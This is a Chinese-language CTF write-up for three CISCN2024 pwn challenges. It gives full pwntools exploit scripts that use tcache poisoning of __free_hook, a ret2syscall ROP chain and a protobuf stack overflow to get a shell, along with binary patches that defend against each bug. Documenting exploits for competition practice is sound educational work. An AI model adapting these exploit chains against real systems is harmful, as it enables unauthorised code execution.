[CISCN2024]华中半决赛 PWN部门题解
这次比赛中我攻击了2道,防御了3道
note
一道2.31堆题,保护全开,存在UAF漏洞
攻击
先填满tcache bin然后利用unsorted bin泄漏libc地址,再UAF修改tcache的fd指针为free_hook,再将system函数的地址写入free_hook,末了触发free函数getshell即可
exp- from pwn import *
- def debug(c = 0):
- if(c):
- gdb.attach(p, c)
- else:
- gdb.attach(p)
- def get_addr():
- return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
- def get_sb():
- return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
- #-----------------------------------------------------------------------------------------
- s = lambda data : p.send(data)
- sa = lambda text,data :p.sendafter(text, data)
- sl = lambda data :p.sendline(data)
- sla = lambda text,data :p.sendlineafter(text, data)
- r = lambda num=4096 :p.recv(num)
- rl = lambda text :p.recvuntil(text)
- pr = lambda num=4096 :print(p.recv(num))
- inter = lambda :p.interactive()
- l32 = lambda :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
- l64 = lambda :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
- uu32 = lambda :u32(p.recv(4).ljust(4,b'\x00'))
- uu64 = lambda :u64(p.recv(6).ljust(8,b'\x00'))
- int16 = lambda data :int(data,16)
- lg= lambda s, num :p.success('%s -> 0x%x' % (s, num))
- #-----------------------------------------------------------------------------------------
- context(os='linux', arch='amd64', log_level='debug', terminal = ['tmux','splitw','-h'])
- #p = remote('8.147.133.173', 19426)
- p = process("./pwn")
- #elf = ELF('./pwn')
- libc=ELF("./libc.so.6")
- def add(size,c):
- rl("5. exit\n")
- sl(str(1))
- rl("The size of your content: \n")
- sl(str(size))
- rl("content: \n")
- s(c)
- def edit(idx,size,c):
- rl("5. exit\n")
- sl(str(2))
- rl("index: ")
- sl(str(idx))
- rl("The size of your content: \n")
- sl(str(size))
- rl("Content: \n")
- s(c)
- def free(idx):
- rl("5. exit\n")
- sl(str(3))
- rl("index: ")
- sl(str(idx))
- def show(idx):
- rl("5. exit\n")
- sl(str(4))
- rl("index: ")
- sl(str(idx))
- for i in range(10):
- add(0x90,b'/bin/sh\x00')
- for i in range(7):
- free(i)
- free(7)
- #debug('b *$rebase(0x15D0)')
- show(7)
- #libc_base=u64(rl(b'\x0a')[-7:-1].ljust(8, b'\x00'))-libc.sym['__malloc_hook']-96-0x10
- libc_base = get_addr()-libc.sym['__malloc_hook']-96-0x10
- lg("libcbase",libc_base)
- free_hook=libc_base+libc.sym['__free_hook']
- system,bin=get_sb()
- edit(6,0x90,p64(free_hook))
- #debug('b *$rebase(0x1370)')
- add(0x90,b'a')
- add(0x90,p64(system))
- free(9)
- inter()
这里我将删除功能里的call free直接nop掉,防御乐成
go_note
一道go的菜单题,一开始还以为是go heap想直接放弃的(看到go就想吐
但之后仔细看一下发现就是栈溢出,漏洞点在edit功能- str = content.str;
- for ( j = 0LL; j < content.len; ++j )
- {
- *(_BYTE *)v8 = *str;
- v8 = (__int128 *)((char *)v8 + 1);
- ++str;
- }
调试看一下溢出偏移,然后ret2syscall就行
这里要提一嘴,找gadget有点麻烦,要用--depth参数增加搜索深度,然后选择一些不影响参数寄存器的gadget来用- ROPgadget --binary ./note --only "pop|ret|add|mov|xor" --depth 30 |grep "pop rsi"
- from pwn import *
- p = process('./note')
- rax=0x000000000040fbdd #pop rax; pop rbp; ret;
- rdx=0x000000000047a8fa #pop rdx ; ret
- rdi=0x0000000000462498 #pop rdi ; add eax, 0xc1894800 ; mov rax, rdx ; add rsp, 0xf8 ; pop rbp ; ret
- rsi=0x0000000000462552 #pop rsi; add eax, 0xc1894800d; xor eax, eax; add rsp, 0xf8; pop rbp; ret;
- syscall=0x000000000045e0a9
- bss=0x526680+0x1000
- p.recvuntil("choice > ")
- p.sendline(str(1))
- p.recvuntil("note content: ")
- p.sendline(b'a')
- payload=b'a'*(0x40)+p64(rdi)+p64(0)+b'a'*0xf8+p64(bss)+p64(rsi)+p64(bss)+b'a'*0xf8+p64(bss)+p64(rdx)+p64(0x100)+p64(syscall)
- payload+=p64(rdi)+p64(bss)+b'a'*0xf8+p64(bss)+p64(rsi)+p64(0)+b'a'*0xf8+p64(bss)+p64(rdx)+p64(0)+p64(rax)+p64(0x3b)+p64(syscall)*2
- p.recvuntil("choice > ")
- p.sendline(str(3))
- p.recvuntil("Please input note id:")
- p.sendline(str(1))
- p.recvuntil("Please input new content:")
- p.sendline(payload)
- p.send(b'/bin/sh\x00')
- p.interactive()
这里我是直接把*(_BYTE *)v8 = *str;这条语句nop掉了,对应000000000047F3DF mov [r12], r13b这条指令
protoverflow
一道简单的protobuf栈溢出题,比赛的时候因为工具出了点问题导致没能打出来,但防御乐成了
赛后自己再重新做了一遍,懒得patch libc,就直接用本机的libc打了(
攻击
漏洞就在memcpy那里
exp- from pwn import *
- def debug(c = 0):
- if(c):
- gdb.attach(p, c)
- else:
- gdb.attach(p)
- def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
- #-----------------------------------------------------------------------------------------
- s = lambda data : p.send(data)
- sa = lambda text,data :p.sendafter(text, data)
- sl = lambda data :p.sendline(data)
- sla = lambda text,data :p.sendlineafter(text, data)
- r = lambda num=4096 :p.recv(num)
- rl = lambda text :p.recvuntil(text)
- pr = lambda num=4096 :print(p.recv(num))
- inter = lambda :p.interactive()
- l32 = lambda :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
- l64 = lambda :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
- uu32 = lambda :u32(p.recv(4).ljust(4,b'\x00'))
- uu64 = lambda :u64(p.recv(6).ljust(8,b'\x00'))
- int16 = lambda data :int(data,16)
- lg= lambda s, num :p.success('%s -> 0x%x' % (s, num))
- #-----------------------------------------------------------------------------------------
- import message_pb2
- context(os='linux', arch='amd64', log_level='debug', terminal = ['tmux','splitw','-h'])
- elf_patch = './pwn'
- p = process([elf_patch], env= {"LD_LIBRARY_PATH":"./"})
- elf = ELF(elf_patch)
- libc = ELF(p.libc.path)
- # debug('b *$rebase(0x332f)')
- rl(b'0x')
- libc_base = int(r(12), 16) - libc.sym['puts']
- rdi = libc_base + 0x000000000002a3e5
- ret = rdi + 1
- system, binsh = get_sb()
- pl = b'a'*0x218
- pl += p64(ret) + p64(rdi) + p64(binsh) + p64(system)
- msg = message_pb2.protoMessage()
- msg.name="1"
- msg.phoneNumber="2"
- msg.buffer = pl
- msg.size = len(pl)
- serialized_msg = msg.SerializeToString()
- s(serialized_msg)
- lg('libc_base', libc_base)
- inter()
将memcpy的size参数改成0x200即可,因为设置该参数的汇编指令mov edx, [rbp-0Ch]只有三个字节的长度,但mov edx,0x200有五个字节,以是不能在原指令上直接修改,这里考虑跳转到eh_frame段(在eh_frame段里随便找个看着顺眼的地址)
如果用CE写过汇编脚本,那下面这个应该更好理解- 0x0331B:
- jmp eh_frame
- nop ;nop来补齐六个字节
- eh_frame:
- mov edx,0x200 ;设置size参数为0x200
- mov rcx, [rbp-8] ;还原被覆盖的指令
- jmp 0x3322 ;跳转回去
|
